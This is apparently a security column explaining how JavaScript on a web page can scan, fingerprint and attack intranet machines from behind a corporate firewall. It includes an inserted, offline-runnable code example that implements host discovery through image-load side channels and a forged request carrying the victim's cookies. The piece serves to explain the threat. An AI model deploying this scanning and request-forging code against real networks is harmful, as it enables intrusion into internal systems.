JavaScript Malware Strikes Firewalls

It's a security hole no one knows how to fix, except by degrading Web browsing to little more than a text-based experience

2:00 PM -- In the beginning, there was application security.

All ports were open to the world and practically every application had holes in it. It was like the Wild West. Eventually application security became a big deal as more serious issues were uncovered and more commerce depended upon secure platforms.

Network security was next on the scene. It made sense to build a single choke point for all security needs. It was slick because it could see all the packets in transit to and from your servers, and turn off all access to anything that had a known hole in it. Those were the good times. Times have since changed.

Network security also had a large role to play in creating the newest attacks. Network administrators rightly told their architects to build applications that could be tunneled over HTTP, while at the same time closing inbound access to every other unnecessary service. Can you see the obvious flaw in that logic?

Even so, aside from the occasional hole in IMAP or BIND, the world of computer security seemed to be calming down quite a bit with the advent of stateful packet inspection and security information management tools. Most of the holes at that time were in the security tools themselves, which most of the hardcore security folks felt was scraping the bottom of the barrel -- the last bunch of entry points into a secured network.

Now there is a new, emerging threat: JavaScript malware. The term was coined by Jeremiah Grossman of WhiteHat Security, and it describes a class of attack we have been working on for nearly a year that bypasses the firewall completely, because the attack rides on the one kind of traffic the firewall has to let through. To be frank, it's the one security hole no one has figured out how to fix yet without degrading your browsing experience back into the text-based dark ages.

Traditionally, every firewall allows one thing by default: outbound access to any Web server on earth. That Web server can either be under the attacker's control or have a cross-site scripting vulnerability in it. When a user inside a corporate LAN visits the malicious Web page, the JavaScript on that page runs inside the user's browser, which already sits behind your firewall, and from there it starts making requests to internal devices. The firewall sees nothing unusual: the only thing that crossed it was an ordinary outbound HTTP request for a Web page.

The first thing the malware does is try to locate any machine that responds. Once it finds one, it attempts to fingerprint the machine for anything that tells the attacker more: which Web server it is running, which might have a known default issue, or whether it runs a particular outdated version of an open source package with a remote file include hole built into it. Using that as a stepping stone, the malware sends the request that triggers the hole, and that request goes out from the user's browser, from inside your corporate intranet, on that user's behalf. If the attack is successful, the machine behind the firewall is compromised.

The attack has a higher chance of succeeding here than it would against the same software on the Internet, because corporations rarely patch internal machines. I mean, why would a company bother to secure its intranet portal? It's just an intranet server and not Web-accessible, right? That's true in principle, but very wrong in practice: any browser on the LAN can reach it, and the attacker now has one of those browsers.

As a side note, most companies alias their portal to a guessable name like http://intranet/YourCompanyNameHere, which makes the attacker's job extremely easy. It even shortcuts having to scan IP ranges, since a single name is enough to guess.

After scanning the corporate intranet, the next step is to execute commands on the machines the malware found, with the eventual purpose of gaining access to them. Whatever payload lands that way will most likely run a series of further commands to gain higher and more permanent access to the compromised machine, which can then communicate back to a command-and-control node over IRC, the same way botnets do.
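The chain the last few paragraphs describe (find a host that answers, fingerprint it, then send the request that acts on the user's behalf) looks like this in code. This is an added example, not RSnake's or WhiteHat's code, and the article does not spell out a technique; it uses the image-request side channel that browsers of the day exposed, where a page learns only whether a cross-origin image loaded, errored, or never answered. Everything concrete in it is constructed for illustration: the `intranet` alias and `10.0.0.x` range, the two signature paths and product labels, the `/admin/do?cmd=EXAMPLE` command URL, and the fake intranet that stands in for the network so the file runs offline under Node. In a browser, `loadImage` would wrap `new Image()` and set `src`.

```javascript
// Added example (not from the article): discover -> fingerprint -> forged request,
// with the network layer injected. In a browser, loadImage would wrap `new Image()`;
// here a constructed fake intranet (bottom of file) stands in for it.

// Step 0: build the target list. The guessable alias goes first, then a small sweep
// of a hypothetical internal range.
function buildTargets(alias, prefix, first, last) {
  const targets = [alias];
  for (let host = first; host <= last; host++) targets.push(`${prefix}.${host}`);
  return targets;
}

// Low-level probe: request one URL as an image. Resolves 'loaded' on onload, 'error'
// on onerror (a host answered, just not with an image), or 'timeout' when nothing
// answered in time. The page never sees the response body: only this side channel.
function probeUrl(url, loadImage, timeoutMs) {
  return new Promise(resolve => {
    let settled = false;
    let timer = null;
    const settle = verdict => {
      if (settled) return;
      settled = true;
      clearTimeout(timer);
      resolve(verdict);
    };
    timer = setTimeout(() => settle('timeout'), timeoutMs);
    loadImage(url, { onload: () => settle('loaded'), onerror: () => settle('error') });
  });
}

// Step 1: host discovery. Any answer before the timeout, even an error, means a host
// is listening; silence means nothing is there.
async function hostResponds(host, loadImage, timeoutMs) {
  return (await probeUrl(`http://${host}/`, loadImage, timeoutMs)) !== 'timeout';
}

// Step 2: fingerprinting. Constructed signatures: a path only one product serves,
// mapped to a label. Real lists are built from default-install images and icons.
const SIGNATURES = [
  ['/images/exampleco-portal.png', 'ExampleCo intranet portal 2.x'],
  ['/img/acme-router-logo.gif', 'Acme router admin UI'],
];

async function fingerprint(host, loadImage, timeoutMs) {
  for (const [path, label] of SIGNATURES) {
    if ((await probeUrl(`http://${host}${path}`, loadImage, timeoutMs)) === 'loaded') return label;
  }
  return 'unknown';
}

// Step 3: the forged request. A plain GET to a state-changing URL, issued by the
// victim's browser with the victim's ambient cookies. The path is hypothetical.
function forgeRequest(host, path, loadImage) {
  const url = `http://${host}${path}`;
  loadImage(url, { onload() {}, onerror() {} });   // fire and forget
  return url;
}

// Runs steps 1 and 2 over the whole target list. Probes run concurrently, so the dead
// hosts cost one timeout in total rather than one each.
async function sweep(targets, loadImage, timeoutMs) {
  const results = await Promise.all(targets.map(async host => {
    if (!(await hostResponds(host, loadImage, timeoutMs))) return null;
    return [host, await fingerprint(host, loadImage, timeoutMs)];
  }));
  return Object.fromEntries(results.filter(Boolean));
}

// Constructed fake intranet so the file runs offline: hostname -> image paths served.
// Hosts not listed never answer, so the caller's timer decides.
const FAKE_INTRANET = {
  'intranet': new Set(['/images/exampleco-portal.png']),
  '10.0.0.1': new Set(['/img/acme-router-logo.gif']),
  '10.0.0.5': new Set(),                            // alive, nothing recognisable
};

function fakeLoadImage(url, handlers) {
  const { hostname, pathname } = new URL(url);
  const served = FAKE_INTRANET[hostname];
  if (!served) return;
  setTimeout(() => (served.has(pathname) ? handlers.onload() : handlers.onerror()), 5);
}

sweep(buildTargets('intranet', '10.0.0', 1, 8), fakeLoadImage, 50).then(found => {
  console.log('hosts behind the firewall:', found);
  for (const host of Object.keys(found)) {
    if (found[host].startsWith('Acme')) {
      console.log('forged:', forgeRequest(host, '/admin/do?cmd=EXAMPLE', fakeLoadImage));
    }
  }
});
```

Two things in the code carry the point of the article. Nothing here needs the attacker's origin to read a response: liveness and fingerprinting come entirely from whether an image load fires onload, onerror, or nothing, and the forged request is just another image load. And every one of those requests originates inside the LAN with the user's cookies attached, which is why the perimeter firewall has nothing to act on.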

The corporate firewall is helpless to protect against this sort of attack. Researchers, myself included, are looking into clever ways to fix the issue, but for now the only fix is to isolate users from all machines on the corporate LAN. Hopefully there will be much more on this to follow. In the meantime, a text-based world isn't looking so bad after all, huh?

— RSnake is a red-blooded lumberjack whose rants can also be found at Ha.ckers and F*the.net. Special to Dark Reading
